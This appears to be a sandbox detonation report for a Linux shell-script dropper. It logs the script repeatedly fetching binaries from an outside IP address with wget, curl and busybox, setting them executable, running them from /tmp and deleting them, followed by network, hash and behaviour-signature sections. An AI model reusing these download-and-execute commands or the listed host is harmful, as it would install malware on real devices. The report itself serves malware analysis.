[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/chmod

[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw

[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/rm

[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/wget

[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/chmod

[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5

[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/rm

[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/wget

[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/chmod

[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0

[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/rm

[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/usr/bin/wget

[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/chmod

[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in

[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/rm

[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/wget

[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/chmod

[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR

[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/rm

[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/wget

[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/chmod

[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss

[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/rm

[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/wget

[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/chmod

[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw

[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/rm

[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/wget

[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/chmod

[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE

[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/rm

[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/wget

[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/chmod

[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao

[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/rm

[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/wget

[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/chmod

[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf

[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/rm

[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/wget

[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/chmod

[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5

[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/rm

[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/wget

[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/chmod

[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao

[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/rm

[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/wget

[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/chmod

[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf

[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/rm

[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/wget

[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/chmod

[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5

[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/rm

[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/wget

[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/chmod

[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in

[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/rm

[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/wget

[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/chmod

[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR

[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/rm

[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/wget

[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/chmod

[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss

[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/rm

[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/wget

[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/chmod

[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw

[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/rm

[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/wget

[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/chmod

[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE

[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/rm

[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/wget

[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/chmod

[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5

[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/rm

[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/wget

[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/chmod

[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok

[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/rm

[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/wget

[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/chmod

[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo

[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/rm

[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/wget

[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/chmod

[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P

[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/rm

[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/wget

[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/chmod

[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw

[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/rm

[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/wget

[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/chmod

[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0

[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/rm

[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 01:07

Reported

2024-11-21 01:09

Platform

debian9-mipsel-20240226-en

Max time kernel

137s

Max time network

140s

Command Line

[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok N/A
N/A /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo N/A
N/A /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P N/A
N/A /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw N/A
N/A /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 N/A
N/A /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 N/A
N/A /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in N/A
N/A /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR N/A
N/A /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss N/A
N/A /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw N/A
N/A /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE N/A
N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf N/A
N/A /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 N/A
N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf N/A
N/A /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 N/A
N/A /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in N/A
N/A /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR N/A
N/A /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss N/A
N/A /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw N/A
N/A /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE N/A
N/A /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 N/A
N/A /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok N/A
N/A /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo N/A
N/A /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P N/A
N/A /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw N/A
N/A /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
